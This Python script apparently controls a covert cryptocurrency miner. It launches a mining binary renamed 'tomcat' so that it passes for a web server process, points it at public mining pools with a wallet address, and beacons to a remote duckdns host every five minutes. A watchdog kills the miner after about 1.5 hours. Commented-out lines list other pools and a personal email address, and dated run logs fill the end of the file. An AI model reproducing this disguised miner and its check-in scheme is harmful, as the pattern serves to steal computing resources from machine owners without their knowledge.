import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:43:05.016157
#2018-02-17 17:32:05.343182
#2018-02-17 19:20:07.352771
#2018-02-17 21:11:04.345939
#2018-02-17 22:55:02.108399
#2018-02-18 00:41:01.499306
#2018-02-18 02:30:09.481412
#2018-02-18 04:17:04.289082
#2018-02-18 06:07:07.660605
#2018-02-18 07:56:07.684054
#2018-02-18 09:45:08.281279
#2018-02-18 11:33:07.306517
#2018-02-18 13:19:01.664462
#2018-02-18 15:09:04.433000
#2018-02-18 16:57:04.719286
#2018-02-18 18:44:05.362519
#2018-02-18 20:31:07.451934
#2018-02-18 22:17:04.058332
#2018-02-19 00:06:02.018968
#2018-02-19 01:52:05.315688
#2018-02-19 03:39:05.475001
#2018-02-19 05:24:04.087441
#2018-02-19 07:13:06.656074
#2018-02-19 09:03:01.508852
#2018-02-19 10:51:02.031591
#2018-02-19 12:39:04.198663
#2018-02-19 14:26:01.975384
#2018-02-19 16:14:06.752174
#2018-02-19 18:02:08.027948
#2018-02-19 19:48:08.009985
#2018-02-19 21:35:04.446208
#2018-02-19 23:21:03.734744
#2018-02-20 01:07:03.886884
#2018-02-20 02:56:07.941533
#2018-02-20 04:45:05.100948
#2018-02-20 06:29:05.308190
#2018-02-20 08:14:04.488214
#2018-02-20 09:59:01.339441
#2018-02-20 11:43:02.103777
#2018-02-20 13:31:05.511106
#2018-02-20 15:15:05.085903
#2018-02-20 16:59:11.343091
#2018-02-20 18:48:09.634729
#2018-02-20 20:37:08.558172
#2018-02-20 22:21:04.920729
#2018-02-21 00:03:06.586402
#2018-02-21 01:48:06.212653
#2018-02-21 03:32:06.109566
#2018-02-21 05:21:03.841550
#2018-02-21 07:08:01.410908
#2018-02-21 08:54:06.960438
#2018-02-21 10:42:01.263214
#2018-02-21 12:29:07.153917
#2018-02-21 14:15:09.275959
#2018-02-21 16:04:02.204347
#2018-02-21 17:54:06.529231
#2018-02-21 19:41:05.633860
#2018-02-21 21:27:06.439948
#2018-02-21 23:15:08.158278
#2018-02-22 01:05:04.288880
#2018-02-22 02:52:07.727159
#2018-02-22 04:40:10.239868
#2018-02-22 06:25:03.722454
#2018-02-22 08:13:05.411512
#2018-02-22 10:01:06.014037
#2018-02-22 11:45:09.936883
#2018-02-22 13:32:09.221048
#2018-02-22 15:20:08.789848
#2018-02-22 17:05:09.353157
#2018-02-22 18:53:06.617603
#2018-02-22 20:44:06.693946
#2018-02-22 22:31:01.343518
#2018-02-23 00:18:05.026421
#2018-02-23 02:07:05.168482
#2018-02-23 03:54:02.202988
#2018-02-23 05:40:07.225953
#2018-02-23 07:25:06.409072
#2018-02-23 09:29:07.912261
#2018-02-23 11:37:05.030412
#2018-02-23 13:28:04.622511
#2018-02-23 15:13:10.043073
#2018-02-23 17:01:07.598710
#2018-02-23 18:48:01.717110
#2018-02-23 20:34:04.102555
#2018-02-23 22:22:04.563061
#2018-02-24 00:07:03.688192
#2018-02-24 01:58:01.835717
#2018-02-24 03:49:04.366231
#2018-02-24 05:31:07.441197
#2018-02-24 07:17:05.712916
#2018-02-24 09:07:04.729625
#2018-02-24 10:44:02.127993
#2018-02-24 12:27:06.475383
#2018-02-24 14:03:05.440312
#2018-02-24 15:45:03.919230
#2018-02-24 17:19:06.960199
#2018-02-24 18:48:04.368608
#2018-02-24 20:20:06.440446
#2018-02-24 21:50:06.854477
#2018-02-25 00:31:05.951294
#2018-02-25 02:38:04.187215
#2018-02-25 06:09:07.223407
#2018-02-25 11:38:04.385302